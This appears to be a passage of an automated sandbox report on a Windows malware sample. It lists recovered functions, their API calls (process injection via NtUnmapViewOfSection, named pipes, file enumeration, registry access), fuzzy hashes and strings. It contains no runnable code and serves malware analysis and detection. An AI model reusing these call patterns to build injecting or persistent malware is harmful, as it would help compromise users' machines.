    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
